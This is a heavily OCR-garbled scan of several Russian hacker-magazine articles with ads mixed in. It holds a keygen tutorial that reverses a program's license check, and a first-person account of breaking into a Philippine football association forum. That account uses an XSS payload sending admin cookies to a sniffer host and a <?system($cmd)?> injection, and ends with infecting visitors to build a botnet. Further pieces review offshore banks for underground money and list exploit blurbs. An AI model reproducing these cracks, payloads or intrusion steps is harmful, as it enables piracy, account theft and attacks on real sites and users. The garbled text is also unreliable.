считывания данных — не что иное, как проверка на наличие этих 
самых данных. Трассируя дальше (по Е8), отметим, что данные счи- 
тываются три раза, последний — самый интересный: 

004946Е9 САШ <ОиМеіег.@СопІгоІ5@ТСопІгоІ@Се1ТехІ$цргѵ> 

004946ЕЕ МОѴ ЕСХ.йѴѴОРО РТР 55:[ЕВР-54] 

004946Е1 ХОРЕОХ.ЕЭХ 

004946ЕЗ МОѴ ЕАХ.ОѴѴОРО РТР ОЗ:[ЕВХ+ЗЕ0] 

004946Е9 САШ ОЕІМеІег. 00491 898 

004946ЕЕ ЗОВ ЕАХ,-2 

00494701 ЗЕ ЗНОРТ ОЕІМеІег. 004947 1 5 

Возможно, что САБЕ ОЕІМеІег. 00491 898 — это и есть проверка. Что- 
бы долго не думать, проверим нашу догадку в отладчике: подменим 
возращенное в регистре ЕАХ значение 0 на 1 и запустим прогу. 
Регистрация прошла успешно. Теперь мы точно знаем, что наша 
проверка лицензии начинается с адреса 491898. Ставим на него 
бряк и вводим данные заново. 

Если бы нам было лень копаться в дебрях проверки, пытаться вос- 
станавливать код и писать «ключеделалку», то, возможно, доста- 
точно было бы просто в начале найденной процедуры занести в 
регистр ЕАХ нужную единичку (МОѴ ЕАХ,1) и вернуться обратно в 
(РЕТ), ведь при любых введенных данных проверка была бы прой- 
дена успешно, и программа была бы побеждена. Однако если уж 
мы взялись за самое трудное, то придется пройти весь путь до кон- 
ца. Начинаем разбор кода. Опять пройдемся от адреса 0049471 5 до 



выхода из процедуры проверки, пытаясь определить, где же в ЕАХ 
заносится ноль. Определили: 

00491947 МОѴ ЕАХ, ЕЗІ 
00491949 РОРЕЗІ 
00491 94А РОРЕВХ 
0049194В РОРЕСХ 
00491 94С РОРЕСХ 
00491940 РОРЕВР 
00491 94Е РЕТІМ 8 

В ЕАХ ноль попадает из регистра ЕЗІ, а в ЕЗІ смотрим код по адре- 
су: 00491804. Что ж, мы уже совсем близко. Нам уже знакомы две 
проверки на нулевую строку по адресам 49Е9С9 и 49Е907. Более 
интересная процедура находится чуть ниже (по адресу 0049ЕА87), 
перед выполнением которой в регистры заносятся адреса наших 
данных и адрес непонятной строки «ОЗ» (чуть ниже то же самое, но 
со строкой N1), который возвращает ненавистный нам ноль. Смот- 
рим найденную процедуру: 

0048Е879 СМР ВУТЕ РТР 03:[ЕАХ],61 
0048Е87С Ш ЗНОРТ ОЕІМеІег. 0048Е886 
0048Е87Е СМР ВУТЕ РТР 05:[ЕАХ],7А 
0048Е881 30 ЗНОРТ ОЕІМеІег. 0048Е886 
0048Е883 АЭО ВУТЕ РТР ОЗ:[ЕАХ],0Е0 
0048Е886 ІІ\ІС ЕАХ 
0048Е887 СМР ВУТЕ РТР ОЗ:[ЕАХ],0 
0048Е88А 3142 ЗНОРТ ОЕІМе{ег.0048Е879 
0048Е88С МОѴ ЕАХ.ЕВХ 
0048Е88Е САШ ОЕІМеІег. 0048Е5С0 
0048Е893 СМР ЕАХ, 18 
0048Е896 ЗЕ ЗНОРТ ОЕІМе1ег.0048Е89Е 
0048Е898 ХОР ЕАХ, ЕАХ 
0048Е89А ЗМР ОЕІМе1ег.0048Е964 
0048Е89Е СМР ВУТЕ РТР 05:[Е5І],61 
0048Е8А2 Ш ЗНОРТ ОЕІМеІег. 0048Е8АС 
0048Е8А4 СМР ВУТЕ РТР 03:[Е5І],7А 
0048Е8А7 30 ЗНОРТ ОЕІМе1ег.0048Е8АС 
0048Е8А9 АйЭ ВУТЕ РТР ОЗ:[Е5І],0Е0 
0048Е8АС СМР ВУТЕ РТР ОЗ:[Е5І],20 
0048Е8АЕ ЗЕ ЗНОРТ ОЕІМе1ег.0048Е8С6 

Разберем этот с виду большой участок. Цикл 0048Е879.. 
0048Е88А — проверка на принадлежность введенных символов 
пароля интервалу ‘а'..’г’ и добавления к АЗСІІ-коду, которому 
принадлежит символ байта Е0. Странно, но окно ввода позволя- 
ет ввести только заглавные буквы и цифры, так что наши симво- 
лы просто не могут быть изэтого ряда. Код чуть ниже — проверка 
длины введенного серийного номера. И если он не равен нужной 
(186=24 символа), то выход из процедуры будете плачевным ре- 
зультатом. Итак, длина пароля нам известна, и она фиксирова- 
на. Поменяем вводимые нами данные для дальнейшего анализа, 
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уровень 

производительности 



РепІіитО 



тзіае 



Сделайте Ваш выбор в пользу 
РІехіюп Махіта Р на базе 



Новейшие 
технологии и 
;ы 



двухъядерного процессора 
ІпіеІ® Репііит® Р и откройте 



новые возможности 
Вашего ПК. 



При покупке компьютера Ріехігоп Махіта О 
получи карту постоянного покупателя в 
магазинах Ф-Центра в подарок. 



: 



й- 






САЛОНЫ-МАГАЗИНЫ: 
ст.м.'Ъабушкинская", ул.Сухонская, 7А 
ст.м."Улица 1905 года", ул. Мантулинская, 2 
ст.м. "Владыкино", Алтуфьевское ш., 16 



СЕРВИС-ЦЕНТР: 

ст.м.'Ъабушкинская", ул. Молодцова, 1 

ФОТО ИНТЕРНЕТ КАФЕ: 

ст.м. "Владыкино", Алтуфьевское ш., 16 



ЕДИНЫМ 

СПРАВОЧНЫЙ 






КОМПЬЮТЕРЫ ОРГТЕХНИКА 
КОМПЛЕКТУЮЩИЕ 



3000 наименований товаров Самый выгодный кредит за 15 мин. Время работы: 10-20, без выходных Бесплат- 
ная доставка* Удобная автостоянка Резервирование товара через интернет Пункт обмена валюты Оплата кре- 
дитными картами Подарки покупателям Соответствие стандартам Техническая поддержка Магазин аксессуа- 
ров Магазин компьютерной литературы Обучающий курс для работы на ПК в комплекте 

* полную информацию о товарах и услугах в конкретных магазинах компании «Ф-Центр» уточняйте на сайте ѴѴ.’ГСвіТІѲГ.ГІІ 



і «Ф-Центр» уточняйте на сайте 



интернет-магазин 



ѵѵѵѵѵѵЛсепІег.ги 









ШЧІХОЮ 
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только теперь введем ровно 24 символа. Код ниже нам уже зна- 
ком — проверка принадлежности символа интервалу маленьких 
латинских букв. Только теперь довольствовались всего лишь 
первым символом. А далее наш первый символ сравнивается 
с буквой О, и, если они не равны, проверка не пройдена. А еще 
ниже сравнивается и второй символ с цифрой 3. Снова меняем 
вводимый код, ставим первыми символы ОЗ (вспомним переда- 
ваемую в процедуру строку, о которой говорилось выше). Не 
забываем перемещать бряки на новые позиции, теперь он у нас 
должен стоять на адресе 0048Е8С6, так как проверку длины и 
первых двух символов введенного кода мы уже прошли, и наш 
новый пароль эти проверки уже проходит. Далее 4 раза вызы- 
вается процедура САІ_1_ 0048Е5ЕА. Ее назначение — получение 
символов из строки, длина последовательности — в регистре 
ЕСХ, а адрес строки — в ЕОХ. Я напротив этих вызовов поставил 
в отладчике символический комментарий в виде Сору(5,1 ,есх). 
Вообще, полезное дело расставлять собственные коммента- 
рии к уже разобранным процедурам — улучшает вид кода в от- 
ладчике и помогает не запутаться в дебрях вызовов процедур. 
Смотрим, какие же части нашего пароля нужны проге. Первый 
вызов вырезает 3 символа, начиная с 4-го, второй — 8 симво- 
лов, начиная с 8-го, третий — последние 8 символов, четвертый 

— 16 первых символов. Назовем их условно строками 1,2,3 и 
4. Получается, что не задействованы у нас третий, седьмой и 
шестнадцатый символ, то есть они могут быть любыми (пока это 
предварительные данные). Заменим их на классическое тире. В 
итоге получаем наш пароль вида 03-ХХХ-ХХХХХХХХ-ХХХХХХХХ, 
где X — неизвестные (пока) символы заглавных букв и цифр 
латинского алфавита. Я ввел 03-456-89012345-78901234. Оста- 
ется выяснить все остальные символы. Назначение процедуры 
САН 0048Е80С понять нетрудно: приводит строку к верхнему 
регистру, исключая пробелы, если они есть. В качестве строки 

— наше имя. А вот следующая процедура производит нехитрые 
манипуляции с преобразованным именем. 

0048Е6В0 ЗНІ_ ЕОХ, 4 

0048Е6ВЗ МОѴ8Х ЕСХ.ВУТЕ РТЕ 08:[ЕАХ] 

0048Е6В6 АОО ЕОХ, ЕСХ 

0048Е6В8 МОѴ ЕСХ, ЕОХ 

0048Е6ВА АШ ЕСХ.Р0000000 

0048Е6С0 ТЕ5Т ЕСХ, ЕСХ 

0048Е6С2 ИЗНОЕТ ОІІМеІег.0048Е6СР 

0048Е6С4 5НЕ ЕСХ, 18 

0048Е6С7 ХОР! ЕОХ, ЕСХ 

0048Е6С9 АШ ЕОХ.ОРРРРРРР 

0048Е6СР ІІЧС ЕАХ 

0048Е600 СМР ВУТЕ РТР! ОЗ:[ЕАХ],0 

0048Е603 Л\І2 ЗНОЕТ ОІЛѴІеІег.0048Е6В0 

Разберем его чуть подробнее: сдвиг числа влево (ЗНІ_) на один раз- 
ряд эквивалентен умножению этого числа на 2. У нас сдвиг на 4 раз- 
ряда, то есть умножение на 16. Накапливается сумма очередного 
кода символа имени, умножаемая на 4 после каждого суммирова- 
ния. Когда имя длинное, и сумма близка к переполнению формата 
ОѴѴОРЮ (программа вылетала бы с ошибкой), она сдвигается впра- 
во на 24 разряда (делится на 2 в 24-й степени). АЫО ЕСХ,Р0000000 
и переход за ней как раз и проверяет наличие единицы в одном из 4 
первых бит числа. Теперь мы на любом удобном для нас языке смо- 
жем восстановить эту процедуру за пару минут, используя арифме- 
тические действия, либо логические операции, каки сделано в про- 
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грамме. Тут дело удобства и привычки. Едем дальше. Следующая 
процедура работает с вырезанной строкой 1 , то есть со строкой 
«456» по нашему введенному коду. Сперва идет проверка на длину 
3 — тут все в порядке. Следующие три вызова одной процедуры 
возвращают порядковый номер каждого символа из нашей стро- 
ки «456» строке «АВСОЕРОШКІММОРСЕЗТІІѴѴѴХѴ2987654». То 
есть для 4 это будет 32, для 5 — 31 и ноль, если введенного символа 
вообще нет в строке. В конце процедуры эти порядковые номера 
немного преобразуются в итоговый результат. Процедура САН 
0048Е7В8 — это совсем просто. Она преобразует строку в число 
(функция ЗігТоІпі в ОеІрИі). Вызывается эта функция два раза: пер- 
вый раз преобразуется строка 2, второй — строка 3. Отметим, что 
число, получаемое из строки 2, затем сравнивается с числом, полу- 
ченным после преобразования введенного имени пользователя, то 
есть они должны быть равны. Выполнив такое же преобразование 
над именем (мы его рассмотрели чуть выше), как и в программе, мы 
можем получить часть верного серийного номера. Имя Ага было 
преобразовано в число 4661 , значит, наш код примет вид 03-456- 
00004661-78901234, где нам уже известны первая и третья его час- 
ти. Смотрим дальше... Нам остается совсем немного: разобрать 
процедуру, которая работает со строкой 4. Функция по адресу 
0048Е953 вычисляет СЕС32 из нашей строки 4 (вспоминаем, что 
нам показал плагин КАЫАІ_), затем выполняется операция ХОР с 
полученной ранее функцией от имени и сравнивается с последней 
частью введенного кода. Если все верно, то мы ввели правильный 
код. Работу алгоритма СЕС32 мы рассматривать не будем, так как 
есть множество готовых исходников и компонентов, реализующих 
этот алгоритм, а при написании кейгена будем использовать уже 
готовый алгоритм. 

Один момент... 

Остается один момент, который касается строки 1 . Результат ее 
преобразования в дальнейшем не используется, то есть на ее мес- 
то можно вставить любые символы (заглавные латинские). Одна- 
ко некоторые люди утверждают, что они все-таки используются в 
скрытых проверках, и по прошествии некоторого времени регис- 
трация становится недействительна. Но голые фразы, без кусков 
кода и процедур скрытых проверок, ничего не доказывают, а у меня 
(да и у многих) программа прекрасно работает уже давно. Такое 
же мнение и у ЕООіЗТ’а/ТЗЕН, автора кейгена к этой программе, 
который был написан задолго до этой статьи. ЕООіЗТ’у отдельное 
большое человеческое спасибо за помощь и консультации при на- 
писании этой статьи. 

Разработка кейгена 

Алгоритм проверки серийного номера мы разобрали. Теперь на- 
метим алгоритм работы нашего будущего кейгена. Первые три 
символапароля «03-» постоянные для любого имени. Следующие 
три могут быть любыми. Число, полученное в результате мани- 
пуляций с ними, нигде в дальнейшем не используется. Следую- 
щая часть серийника будет генерироваться от введенного имени 
пользователя, а последняя — как результат СЕС32 от всей полу- 
ченной до этого строки. Тебе остается только собрать воедино 
алгоритм на своем любимом языке программирования. Если ал- 
горитм кейгена не совсем понятен, то на диске можно будет найти 
мои исходники с комментариями, написанные на ОеІрЫ, или за- 
дать мне конкретные вопросы по е-таіі. Желаю удачи на поприще 
реверс-инженеринга. зс 
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РБК 

ХОСТИНГ 

ЦЕНТР 



ЗАКАЧАЙ НА САЙТ 

СЛОНА! 




Новый тариф от Хостинг-Центра РБК 

ГИГАБАЙТНЫЙ 



БЕСПРЕДЕЛ 



ІШр://Гю5іІпд.гЬс.ги, +7 (495) 363-0309 



На сегодняшний день 
практически все де- 
нежные операции 
проходят непосредс- 
твенно через гло- 
бальную Сеть. Как же 
представителю сете- 
вого андеграунда про- 
изводить финансовые 
операции, не стра- 
шась засветить свои 
личные данные? Ведь, 
согласись, далеко не 
все эти операции идут 
в ногу с законом. 
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Фет 

Фѳт, или фѳтхард ( ѵѵѵѵѵѵ.іеФагсІ.Ьіг ) зани- 
мает лидирующую позицию в банковс- 
ком бизнесе «нашей» направленности. 
Конечно, нельзя не упомянуть об одном 
случае, который подорвал репутацию 
многих клиентов к банку. Об этом случае 
писали на « планете «, «крутопе» и других 
форумах андеграунда. Фет крупно кинул 
некоторых довольно известных кардеров, 
чем заслужил неуважение со стороны 
последних. Однако время идет, люди меня- 
ются, и инцидент уже практически никто не 
вспоминает (если не напоминать). В целом 
же банк сейчас очень хорош, особенно 
когда заходит речь о конфиденциаль- 
ности, и главное, о безопасности. После 
открытия счета клиент должен скачать 
программу для управления электронными 
ключами. Вход в клиентскую часть осу- 
ществляется через защищенный ИДз канал 
с 256-битным шифрованием. Более того, 
существует привязка к ІР-адресам клиента 
для входа. Но, даже узнав логин/пасс, 
неприятель сможет всего лишь позавидо- 
вать твоему астрономическому балансу. 
Любые операции с валютой происходят с 
помощью запросов, генерируемых про- 
граммой. Программа работает с ключами 
(наподобие кипера в веб-мани). Ключи 
также находятся под парольной защитой. 
Если ты захочешь украсть чужие деньги с 
Фета, то надо воровать пароли на вход в 
систему и сами ключи, что, естественно, 
проблематично. К тому же фильтрация по 
адресу тоже чего-нибудь да стоит. Вот, в 
принципе, и вся безопасность, но не ей 
только славен Фет. Ты можешь выправить 
в банке за умеренную плату пластиковую 
карту. Снимать деньги, конечно, можно 
только в банкомате, ну а в остальном это 
обыкновенная пластиковая карта, только 
выдана она на имя неизвестного китайца. 
Однако «в Интернете халявы нет!»(с) — 
так просто в жизни ничего не бывает. Банк 
сам следит за тем, чтобы никто не исполь- 
зовал его как средство для отмыва денег. 
Поэтому существует система рейтингов 
клиентов. Например, клиент с первым 
уровнем ограничен суммой в $9000 в месяц 
(то есть только такую сумму он может за 
месяц провести через свой счет). Кроме г 
того, к примеру, приходы ваером с частных 1 
лиц на счета первого уровня отправляются | | 
обратно. 



Ямба 

Ямба ( ѵѵѵѵѵѵ.ѵатЬо.Ыг ) до недавнего вре- 
мени был одним из популярнейших банков 
сетевых олигархов. Он привлекал многих 
своим хорошим сервисом, однако не всем 
нравился успех этой системы. У банка 
зачастую возникали проблемы с потре- 
бителями: доходило дело до бойкотов со 
стороны последних. И вот роковой момент 
настал... Сегодня на заглавной странице 
сайта красуется надпись, гласящая о том, 
что счета клиентов заморожены из-за су- 
дебного иска, который подали две крупные 
американские компании. 



ГіпехЬапк 

В настоящее время очень популярен фи- 
нексбанк ( ІіпехЬапк.сот ). Контора предо- 
ставляет скромный, но необходимый набор 
услуг. Само собой, это открытие расчетного 
и инвестиционного счетов. Впрочем, на 
сайте сообщается, что управление счетом 
происходит с помощью программы Іпіегпеі 
Вапкіпд: «Указанная программа позволяет 
клиенту формировать платежные поруче- 
ния как для осуществления безналичных 
расчетов, так и для получения наличных 
средств посредством представления к 
оплате чеков международных платежных 
систем и банков». Вообще, банк отличается 
хорошим сервисом и быстрой работой 
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Скоро Чемпионат мира по 
только о нем. Недавно 
щадка, с которой можно 
Довольно привычная тема - 
е-шоп, и совершать загрузки 
я решил поломать какой - 
футбольный сайт. . 



денежный вид спорта 

Заливаем троянов с сайта филиппинской футбольной ассоциации 



Выбор жертвы 

Подумав о футболе, я сразу вспомнил о популярном ресурсе 
іооШаІІ.сот . на котором недавно нашел ошибку. Благодаря этому 
можно было локально читать файлы. Ты и сам можешь посмотреть 
на этот баг, для этого достаточно перейти по адресу: ѵѵѵѵѵѵТ ооШаІІ. 
сот/саі-Ьіп/р озІег5/ргіпіРо5І юді?саіедогу=соІІедеТеаШгез&а і=/еІс/ 
раззѵѵб. Легко понять, что на этой странице тебе покажется содер- 
жимое файла /еіс/раззѵѵсі . К сожалению, ничего значимого с этого 
бага мне поднять не удалось. Одна из идей дальнейшего взлома у 
меня заключалась в том, чтобы просмотреть содержимое самой 
программы ргіпІРозІ.сді и вытащить оттуда пароль к базе данных. 
Однако появилась проблема: сді-приложение представляло собой 
скомпилированную программу, бинарный файл. Соответственно, 
чтобы вытащить оттуда текстовый пароль, нужно было провести 
исследование этого бинарника. Из этой затеи у меня ничего хо- 
рошего не получилось, поэтому предлагаю тебе самому провес- 
ти исследование этой программы и попробовать разобрать ее на 
кирпичики. Конечно же, только в исследовательских целях! Это 
действительно интересное занятие. 



А мы вернемся к моей затее по взлому футбольного сайта. Я быс- 
тро нашел довольно колоритный сайт ѵѵѵѵѵѵ.рЫІіо оШаІІ.іпіо — ре- 
сурс филиппинской футбольной ассоциации. Звучит интересно, 
не так ли? Ну что ж, поехали! 

Первое знакомство 

Итак, что мы имеем. Как легко заметить на скрине, сайт доволь- 
но убогий. Все набито на голом Иіітіі, поэтому копать тут нечего. 
И сколько я ни шарился по различным линкам, ничего интерес- 
ного так и не нашел :(. Спасло меня только то, что на сайте был 
установлен чат и форум, на которые и оставалась вся надежда. 
По старой традиции я начал с форума. Там стоял старый-добрый 
МегсигуВоагб, что меня обрадовало. Сейчас расскажу почему. 

Лично мне этот движок очень нравится, но, несмотря на это, он, 
каки любой другой, имеет дырки. Форум, как я сразу заметил, за год 
уже перебрался на ветку повыше — 1.1.3, поэтому для теста была 
выбрана старая версия, которая сохранилась у меня на старой 
болванке. Так как для этого движка в паблике не было выложено 
ни одной уязвимости класса РНР зоигсе іпіесііоп, а самому искать 



072 



ХАКЕР 05 /89/ 06 



футболу, и все мои мысли 
мне понадобилась пло- 
было бы заливать троянов . 
— поломать американский! 
и оттуда. Нов этот раз 
нибудь популярный 



исходники мне было лень, я решил для начала остановиться на зці 
іпіесііоп. Порывшись пять минут в багтраках и выцепив парочку ску- 
пей, я начал тестировать на локалхосте. Все прошло на ура, но при 
тесте на «Филиппинах» сплоиты работать подчистую отказывались. 
В порядке теста, на локальной системе, мной была найдена еще одна 
недокументированная зці-инъекция, но опять же на рбіІІооіЬаІІ рабо- 
тоспособность ее была нулевой. Забегая вперед, хочу заметить, что 
администратор форума оказался грамотным человеком, обладал хо- 
рошей интуицией и привычкой перечитывать логи перед сном. Сразу 
вспомнились времена, когда КЕ2с РіпкРапіНег'ом релизили СЗЗ-дыр- 
ки под этот движ ок. Почитать об этом можно тут: Нйр:/До гит.апіісНа1. 
щДНгеасІ5971 .Иіті и Иі1:р:/Догит.ап1ісІіа1:.гиДІігеаб5796.Іі1:тІ. 

Как я и рассчитывал с самого начала, все оказалось легко и 
просто, и использованный мною скрипт проскочил, но был выре- 
зан фильтром форума. Я запустил ІпеЮгаск и закодировал строку 
«Іаѵа» десятичной кодировкой, в результате чего получил «&#106 



&#224&#1 18&#97&#1 15сгір1>, и скрипт для тестового локального 
алерта стал выглядеть следующим образом: 

[соІог=іпсІідо:Ьаскдгоипб:игІ(&#106&#224&#1 18&#97&#1 Ібсгірі: 
аІеП(сіоситеп1.соокіе))][/соІог] 

«Ура, все работает», — подумал я и принялся переделывать скрипт 
для отправки полученных значений куков на снифер. Как видишь, 
в куках у нас спокойно хранится и сессия, и ісі пользователя, и 
его ІТ1СІ5 хэш, что не может не радовать. В общем, ничего лишнего. 
При перекодировке слово іаѵазсгірі было замечено, что ни одна 
комбинация, будь то &#106&#224&#1 18&#97&#1 15 &#99 гірі или 
&#106&#224&#1 18азсгір1:, не хотела работать, и лишь только первона- 
чально найденная мной золотая середина выдавала тестовый алерт 
на ура! 

Теперь же я принялся за составление запроса, отправляющего 



Выцедив имя и пароль, я стал подбирать различ- 
ные комбинации к Йр и 88І1. Но опять же, поко- 
павшись минут десять, снова обломался. 

И было из-за чего: с шеллом ничего не получи - 
лось, админки сайта нет, все — на 1іТш1...^^Н| 



9 

Помни, действия каждого 
взломщика противозаконны, 
так что советую ничего из 
вышеописанного не повторять. 
Все написано только для озна- 
комления. 
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куки на снифѳр, но, к моему великому удивлению, куки не шли. 
Не хотелось заморачиваться на причине происходящего, и я по- 
полз колупать другие модули. Уязвимости-то есть, так зачем же 
останавливаться только на одной? К большому сожалению, воз- 
можность подгрузки ХЗЗ-скрипта через аватарку тут работать не 
хотела, а парсеры в этой версии двига со своей задачей справи- 
лись, поэтому был взят курс на личные сообщения ( РДрУЯогит. 
ап1ісНаігиЛНгеасІ5796.НітІ У Вот здесь я уже не рассчитывал 
встретить дырки, ведь, насколько я помню, их убрали еще в самых 
первых версиях. Но как впоследствии оказалось, запретили толь- 
ко использовать слова «зсгірі» в ІШе — оно парсилось, вставляя 
какую-то фигню в середину слова, но самое главное — ни скобки, 
ни кавычки, ни слеши не парсились! В течение одной минуты был 



пользователя осуществляется без подтверждения пароля. 

Итак, адрес в профайле был изменен, а прибывший хэш за- 
гнан в переборщик. Через пару секунд я уже жалел о том, что 
использовал функционал ку, так как пароль подобрался по моим 
словарям невероятнобыстро — им оказалось слово «тегсигіаі», 
а прежний админский мейл я уже и забыл . Я не стал заново изме- 
нять его, так как вся моя затея могла рухнуть. В общем, палево. 
Ты, наверное, скажешь: «Да какое палево, авторизируйся, лезь 
быстро в админку и делай свои дела — все успеешь». Ан нет, в 
данном движке, при авторизации двух человек одновременно, 
они оба отображаются в активных пользователях. Зачем мне 
отображение двух админов одновременно? Так что оставалось 
ждать, когда администратор пойдет спать. 



Но все-таки настройки были выставлены правильно, и меня громко послали 
нафиг. Мол, данному пользователю любая хакерская деятельность запрещена. 
Отчаявшись, я полез смотреть пароли к Б Д . . 



сооружен и оттестирован на себе ХЗЗ-сплоит, без использовании 
словзсгірі, іаѵаи пр. : 

Думаю, что все ясно. Скажу несколько слов про админа. Он 
действительно оказался не простым парнем. Сначала забанил 
айпи одного из моих ѵрп-аккаунтов, потом постоянно писал мне 
приваты, все спрашивая, кто я такой, как попал на форум и откуда 
родом, потом звал пообщатся в чат. 

И хотя вредоносного скрипта в списке сообщений видно не 
было, все работало отлично, но при ответе на сообщение он вы- 
давал меня с головой. Учитывая то, что я вел активную переписку с 
админом, отвечая на его бредни, а он — на мои, допустить своего 
разоблачения я не мог. Приятная новость не заставила себя долго 
ждать. Помнишь, я говорил, что кавычки не парсятся. Так вот, имен- 
но одинарная кавычка, из-за плохого парсинга, позволила нам на- 
рушить структуру тэга іприі и выйти за границы ѵаіие, тем самым 
скрывая от глаза злобного админа вредоносный скрипт. Вот так 
мой сплоит и прорвался в дебри ИГт 1-документа, оставшись при 
этом полность незамеченным: 

<16 сІазз='{аЫесІагк'><іпріЛ сІазз='іпріД' пате='Ш1е' зі2е='60' 

ѵаІие='Не:'<Ьо6уопЦоа6=ітд.згс="ІзДр://зіІе.сот/зпіИ.рІзр?"+6оситепІ 

соокіе>'/><Л6> 

В финале мой скрипт стал выглядеть таким образом: 

Не:'<Ьо6уопЦоа6=ітд.згс="ІзДр://зіІе.сот/зпіИ.рИр?"+6оситепІ 

соокіе> 

Теперь о снифере. Честно говоря, я боялся, что за предельно корот- 
кие сроки не смогу расшифровать хэш такого умного админа, поэтому 
было решено написать функционал ку. Чтоэтотакое, думаю, РіпкРапіИег 
тебе хорошо объяснил в статье об укр.нет, поэтому не вижу смысла все 
разжевывать: исходник снифера для данного форума есть на врезке. 
Работает он только благодаря тому, что смена етаіі-адреса в профайле 



В админке 

Через пару часов админ свалил, и я приступил к своим грязным 
делам, то есть полез на форум. Авторизировавшись в админке, 
захотел получить шелл. 

Изначально задумка была такова. В МегсигуВоагб есть такая 
фишка, как командная строка БД, то есть можно вытворять с базой 
данных все, что хочешь. Я сразу же вспомнил свой старый опыт с 
данным форумом, дописал к названию одного из разделов нехит- 
рую банальную комбинацию <?зузІет($стсІ)?>, а дальше полез в 
БД-консоль делать бэкап данного раздела. 

Расскажу, как я узнал полный путь к папке с форумом. Все очень 
просто. Админка имеет столько всяких примочек, что такую про- 
стую штуку, как полный путь к скрипту, узнать никакого труда не 
составляет. Смотри сам, рбріпіо — на скрине: 

Теперь, когда полная картина ясна, объясню. Я пытался сбэка- 
пить один из разделов форума, где находился наш инкпуд, в файле 
стб.рИр. Но все-таки настройки были выставлены правильно, и 
меня громко послали нафиг. Мол, данному пользователю любая 
хакерская деятельность запрещена. Отчаявшись, я полез смот- 
реть пароли к БД — надеялся, что хоть к чему-то они подойдут. Да- 
да, админка форума и этим радует — прям рай для хакера. 

Выцедив имя и пароль, я стал подбирать различные комбинации к 
ЙриззН. Но опять же, покопавшись минут десять, снова обломался. 
И было из-за чего: с шеллом ничего не получилось, сайта админки 
нет, все — набіті, пассы кіф/ззб подобраны не были, поэтому при- 
шлось, как видишь, ограничиться только админкой форума. 

Мораль 

Как ни странно, посещаемость у ресурса оказалась высокой, 
причем основной народ сидел под бажным ослом. Для загрузок я 
решил использовать недавно вышедший эксплойт, который опи- 
сывается в статье "Ослу - ослиная смерть". На момент моих экспе- 
риментов пробивалось примерно 30% машин, и я быстро набрал 
неплохой ботнет, ш 
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МА5ТЕВ-І_АМЕ МА5ТЕП 



ЕХРЮІТЗ 

РЕѴІЕѴѴ 



ЫоѵеІІ Меззепдег Зѳгѵѳг 2.0 (Ассері- 
Бапдиаде) Ветоіе ОѵеіТІоѵѵ Ехріоіі 



РНР1 21 Іпзіапі Меззепдег <= 1 .4 



МогіІІа РігеТох < = 1 .5.0.1 



описание: Вот наконец-то хакеры дотя- 
нулись и до малоизвестной ІМоѵеІІ. Новый 
эксплойт вышел 15-го апреля. На сей раз 
обнаруженная ими уязвимость позволя- 
ет удаленному пользователю выполнить 
произвольный код на целевой системе. 
Банально, но факт. Дыра заключается в 
ошибке функции проверки границ данных в 
службе Меззадіпд Адепі, что висит на 8300 
порту. При обработке заголовка «Ассері- 
Бапдиаде:», используя слишком длинную 
строку (более 1 6-ти символов), хакер может 
скомпрометировать переполнение стека и, 
как следствие, выполнить произвольный 
код на целевой системе. 

защита: Подробнее посмотреть и забрать 
заплатку можно с официального сайта про- 
изводителя: 

ИДр://зиррог1.поѵеІІ.сот/сді-Ып/зеагсИ/ 
зеагсІіМсаі?1 01 00861 .Иіт 

ссылки: Сплоит забираем по адресу: 

| ИДр://тіІѵѵ0гт.сот/ехрІоі1з/1679 

I злоключение: ЫоѵеІІ — не очень рас- 
пространенная система, поэтому массовых 
поломок, конечно же, не будет. Однако сле- 
дует учесть, что она широко применяется 
в крупных серверных компаниях. Взломов 
будет немного, но произойдет большая 
утечка информации. 

дгееіз: Выражаем респект Н О Мооге за 
написание сплоита. 



описание: Апрель выдался для програм- 
мистов урожайным. В День космонавтики 
вышел сплоит, использующий уязвимость 
в РНР121 Іпзіапі Меззапдег. Она позволя- 
ет удаленному пользователю выполнить 
произвольные ЗОІ_-команды в базе данных 
приложения. Уязвимость существует из-за 
недостаточной обработки входных дан- 
ных в параметре файла куки, в сценарии 
ріпрі 21 Іодіп.рПр. Хакер с помощью специ- 
ально сформированного файла куки име- 
ет возможность выполнять произвольные 
8СІ_-команды в базе данных приложения. 

защита: В настоящее время способов 
устранения данной уязвимости не сущест- 
вует. Однако надо учитывать, что для рабо- 
ты сплоита должна быть выключена опция 
«тадіс_дио1:ез_дрс». 

ссылки: Сплоит забираем по адресу: 
ѵѵѵѵѵѵ.тіІѵѵОгт.сот/ехрІоіІз/1666 
Или читаем про него на: 
ѵѵѵѵѵѵ.хакер.ги/розІ/ЗІ 106/беІаиІІ.азр 

злоключение: Как всегда, все, что свя- 
зано с РНр, можно поломать. Теперь поль- 
зователям надо быть крайне осторожными. 
Совет: пересматривайте и переписывайте 
скрипты сами. 

дгееіз: Сплоит был написан человеком 
с ником гдосі ( гаоб@аи1із1ісі.ога Т который 
также предлагает посетить свой сайт: НДр:// 
геігоаоб.аііегѵізіа.ога 



описание: 13-го апреля в багтрак-лентах 
появилась информация о свежем баге в [ 
МогіІІа: из-за допущенной ошибки разыме- 
нования нулевого указателя, хакеры полу- 1 
чили возможность удаленнно досить бра- 
узеры. Весь код эксплойта представляет | 
собой 6 строк: 

<ІедепсІ> 

<кЬб> 

<оЬіес1> 

<Н4> 

</оЬіес1> 

</кЬсІ> 

защита: В настоящее время защиты от I 
уязвимости не существует. Следует либо 
отказаться от использования пізсі, либо | 
фильтровать 2049 порт при помощи файр- 
вола. Справедливости ради надо сказать, 
что на данном этапе существования дырки, 
большой опасности она не представляет. 

ссылки: Почитать о баге и проверить бра- 
узер на уязвимость можно на этой странице: | 
ѵѵѵѵѵѵ.тіІѵѵОгт.сот/ехрІоіІз/І 667. 

злоключение: Это действительно се- 1 
рьезно. Тысячи людей выходят в Интернет 
через этот браузер, и уязвимость не оста- 1 
нется незамеченной. 

дгееіз: Передаем приветы Симону Морелу | 
( І7ітазк@11пе1паскабетѵ.пе1 ). Томасу Валь- 
дегеру ( ЬиаІгад^^тогрІпЗиз.ога ). а также 
бравым парням из группы ВиНа-8есигіІу | 
Соттипііу ( НДр://ЬиНа.іпіо/ЬоагсП . 
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Нѳ забывай, что вся приведенная ниже информация предна- 
значена только для ознакомления и нѳ является руководством к 
действию. 



В конце марта этого года новость о критической уяз- 
вимости в Іпнегпеі: Ехріогег 6.0 буквально облетела все 
известнейшие багтраки. И это неудивительно, ведь, судя 
по описаниям, свеженайденный баг имел большие пер- 
спективы для хакеров - под прицелом оказались милли- 
оны машин. В число потенциальных жертв также попа- 
дали машины с пропатченными ѴѴіпсіот ХР 8Р2. Эта 
